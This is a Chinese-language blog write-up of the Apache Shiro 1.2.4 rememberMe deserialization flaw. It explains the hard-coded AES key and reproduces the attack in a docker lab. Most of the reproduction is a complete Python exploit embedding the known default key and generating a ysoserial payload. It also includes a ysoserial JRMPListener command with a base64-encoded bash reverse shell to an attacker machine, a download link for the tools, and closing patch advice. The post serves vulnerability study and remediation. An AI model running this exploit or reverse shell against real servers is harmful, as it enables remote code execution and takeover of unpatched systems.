25. Apache Shiro Java反序列化漏洞

前言：

最近在审核漏洞的时候，发现尽管Apache shiro这个反序列化漏洞爆出来好久了，但是由于漏洞特征不明显，并且shiro这个组件之前很少听说，导致大厂很多服务还存在shiro反序列化的漏洞，这里对漏洞进行简单分析与复现。

一.漏洞前析

0x01 什么是Apache Shiro？

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

0x02 漏洞的特征是什么？

shiro反序列化的特征：在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段

就像这样：

0x03 漏洞影响

只要rememberMe的AES加密密钥泄露，Apache Shiro <= 1.2.4版本均存在威胁

二.漏洞简介

0x01 漏洞发生的原因

先看下shiro官网的漏洞说明：https://issues.apache.org/jira/browse/SHIRO-550

大概意思是，shiro在登陆处提供了Remember Me这个功能，来记录用户登陆的凭证

然后shiro使用了CookieRememberMeManager类对用户的登陆凭证，也就是remember Me的内容进行一系列处理：

使用Java序列化 ---> 使用密钥进行AES加密 ---> Base64加密 ---> 得到加密后的remember Me内容

同时在识别用户身份的时候，需要对remember Me的字段进行解密，解密的顺序为：

remember Me加密内容 ---> Base64解密 ---> 使用密钥进行AES解密 --->Java反序列化

问题出在AES加密的密钥Key被硬编码在代码里，这意味着攻击者只要通过源代码找到AES加密的密钥，就可以构造一个恶意对象，对其进行序列化，AES加密，Base64编码，然后将其作为cookie的remember Me字段发送，Shiro将rememberMe进行解密并且反序列化，最终造成反序列化漏洞。

通过源码，果然找到了被硬编码在代码里的Key值：

三.漏洞复现

0x01 环境搭建

这里使用docker进行环境搭建：https://github.com/Medicean/VulApps/tree/master/s/shiro/1

.拉取环境到本地
$ docker pull medicean/vulapps:s_shiro_1
.启动环境
$ docker run -d -p : medicean/vulapps:s_shiro_1

上图即为搭建成功

同时要编译生成ysoserial反序列化利用工具

ysoserial是一款目前最流行的Java反序列化Payload生成工具，目前支持29种的Payload生成。

git　clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -D skipTests

即可生成ysoserial-0.0.6-SNAPSHOT-all.jar文件

0x02 poc利用过程

靶机ip：192.168.127.128

攻击机ip：192.168.127.129

大佬poc：shiro_poc.py：

#coding: utf-8

import os
import re
import base64
import uuid
import subprocess
import requests
import sys
from Crypto.Cipher import AES

JAR_FILE = './ysoserial-0.0.6-SNAPSHOT-all.jar'

def poc(url, rce_command):
    if '://' not in url:
        target = 'https://%s' % url if ':443' in url else 'http://%s' % url
    else:
        target = url
    try:
        payload = generator(rce_command, JAR_FILE)  # 生成payload
        r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10)  # 发送验证请求
        print r.text
    except Exception, e:
        pass
    return False

def generator(command, fp):
    if not os.path.exists(fp):
        raise Exception('jar file not found!')
    popen = subprocess.Popen(['java', '-jar', fp, 'JRMPClient', command],
                             stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    poc("http://192.168.127.128:8080","192.168.127.129:1096")

这里直接以getshell为例

首先制作反弹shell的命令，使用http://www.jackson-t.ca/runtime-exec-payloads.html进行编码

使用ysoserial中的JRMP监听模块，监听1096 端口

这里介绍一下上面poc里面的JRMPClient与下面使用监听命令的JRMPListenter

• payloads/JRMPClient 是结合 exploit/JRMPListener 使用的
• JRMPListener是ysoserial 工具里的其中一个利用模块，作用是通过反序列化，开启当前主机的一个 JRMP Server ，具体的利用过程是，将反序列化数据 发送到 Server 中，然后Server中进行反序列化操作，并开启指定端口，然后在通过JRMPClient去发送攻击 payload
• payloads/JRMPClient 生存的 payload 是发送给目标机器的，exploit/JRMPListener 是在自己服务器上使用的
• 超详细分析：https://xz.aliyun.com/t/2650

我这里在攻击机上执行监听命令：

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar  ysoserial.exploit.JRMPListener 1096 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNy4xMjkvODg4OCAwPiYx}|{base64,-d}|{bash,-i}

在要反弹到的机器上执行监听8888端口，静候shell

执行poc：

py -2 shiro_poc.py

可以看到JRMP模块已经成功收到连接请求，同时也执行了我们的payload，shell弹了回来

至此利用成功。

这里提供工具下载包括

• poc文件
• ysoserial-0.0.6-SNAPSHOT-all.jar文件
• 密钥硬编码文件shiro-core-1.2.4.jar

链接：https://pan.baidu.com/s/175Zbe53ahIYese1rZCWFKg
提取码：66p1

四.修补建议

升级shiro到1.2.5及以上，如果shiro的rememberMe功能的AES密钥一旦泄露，就会导致反序列化漏洞。

跟了shiro 1.3.2的代码，看到官方的操作如下：

• 删除代码里的默认密钥
• 默认配置里注释了默认密钥
• 如果不配置密钥，每次会重新随机一个密钥

可以看到并没有对反序列化做安全限制，只是在逻辑上对该漏洞进行了处理。
如果在配置里自己单独配置AES的密钥，并且密钥一旦泄露，那么漏洞依然存在。

参考链接：

https://www.cnblogs.com/paperpen/p/11312671.html

https://paper.seebug.org/shiro-rememberme-1-2-4/

https://mp.weixin.qq.com/s/KkWL9SftCZSdkglW39Qw0Q